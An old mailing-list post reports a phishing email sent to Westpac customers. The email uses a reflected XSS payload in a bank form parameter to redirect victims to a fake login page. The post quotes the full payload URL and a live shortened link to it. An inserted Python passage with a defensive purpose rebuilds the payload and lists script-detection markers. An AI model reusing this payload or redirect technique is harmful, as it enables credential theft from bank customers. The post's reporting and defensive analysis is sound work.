[LINK] Phishing plumbs new depths for Westpac Customers: XSS

Rick Welykochy rick at praxis.com.au
Tue Nov 21 11:02:48 AEDT 2006


Just ran across this attempt at phishing for my Westpac username and password:
(snipped from the phishing email)


   Westpac Banking

   No additional action is required by you to continue to
   use your online services.

   To review the changes [to Terms and Conditions], click on the link below:

and here is the link:

   https://www.westpac.com.au/forms/AskWestpac.nsf/
   f_askWestpac?OpenForm&refTitle=<script>document.location=
   'http://203.144.80.87/manual/.modonline/new.html'</script>

I broke up the link into 3 parts for readability. The link does actually
look valid, it takes you to the Westpac secure web site, but then the
XSS (cross-site scripting) redirects you to a fake login page at
http://203.144.80.87/manual/.modonline/new.html.
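The mechanism Rick describes is a reflected XSS: the Westpac form echoes the `refTitle` query parameter into its page without HTML-escaping it, so a `<script>` in the parameter runs in the bank's origin and can rewrite `document.location`. The Python below is an added illustration written for this post, not code from Rick or from Westpac: it contrasts the unsafe reflection with an escaped one and adds a simple mail-gateway style check that flags links carrying script markers in their query string. The URL, the placeholder redirect host `attacker.example` and the function names are constructed assumptions.

```python
import html
from typing import List
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample in the shape of the phishing link quoted in the post.
# The redirect target is a placeholder host, not the address from the email.
VULNERABLE_URL = (
    "https://www.westpac.com.au/forms/AskWestpac.nsf/f_askWestpac"
    "?OpenForm&refTitle=<script>document.location='http://attacker.example/'</script>"
)


def ref_title_from(url: str) -> str:
    """Pull the refTitle query parameter out of a URL (empty string if absent)."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return qs.get("refTitle", [""])[0]


def render_title_unsafe(ref_title: str) -> str:
    """Reflects the parameter verbatim into the page markup.

    This is the defect class behind the phish: browser-supplied text becomes
    markup, so a <script> tag in the parameter executes in the site's origin.
    """
    return f"<h1>{ref_title}</h1>"


def render_title_safe(ref_title: str) -> str:
    """Escapes the parameter for an HTML text context before reflecting it.

    html.escape turns <, >, &, " and ' into entities, so the same input is
    displayed as literal text and no script element is created.
    """
    return f"<h1>{html.escape(ref_title, quote=True)}</h1>"


# Substrings a gateway or URL-rewriting filter would treat as suspicious when
# they appear inside a query parameter value (after percent-decoding).
SUSPICIOUS_MARKERS = ("<script", "javascript:", "document.location", "window.location")


def flag_reflected_script(url: str) -> List[str]:
    """Return the names of query parameters whose values carry script markers.

    Intended for scanning links in inbound mail: a bank URL whose parameters
    contain <script> or a location rewrite is a strong phishing indicator.
    """
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    flagged = []
    for name, values in qs.items():
        for value in values:
            decoded = unquote(value).lower()
            if any(marker in decoded for marker in SUSPICIOUS_MARKERS):
                flagged.append(name)
                break
    return flagged


if __name__ == "__main__":
    title = ref_title_from(VULNERABLE_URL)
    print("unsafe :", render_title_unsafe(title))
    print("escaped:", render_title_safe(title))
    print("flagged:", flag_reflected_script(VULNERABLE_URL))
```

The escaped rendering shows the parameter as visible text rather than a script element, which is the server-side fix; the flagging function is the kind of check a mail filter could run on links before a user ever clicks them.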

Try http://tinyurl.com/tksrx if you wish to see it in action.

I'm afraid this one might catch all but the technically savvy amongst us.

Westpac has been contacted about this. Unfortunately, their website has web-based
forms only for email and no interface is provided to alert their IT staff to
the existence of such a hoax as the one above. I had to submit the email and
further details via a pitifully inadequate web form. I have my doubts as to
how far into the system my alert will survive. And I note with some annoyance that
the link for actual feedback does not work (never returns a page) so I had to
use a far less appropriate page.

The page that would not respond to my browser is here:
http://www.westpac.com.au/Forms/single_page_forms.nsf/f_customerServiceFeedbackServiceProblem
Can other Linkers actually see this page? I cannot, neither with Firefox
nor with Safari.
cheers
rickw
-- 
_________________________________
Rick Welykochy || Praxis Services

Welcome to the department of redundancy department.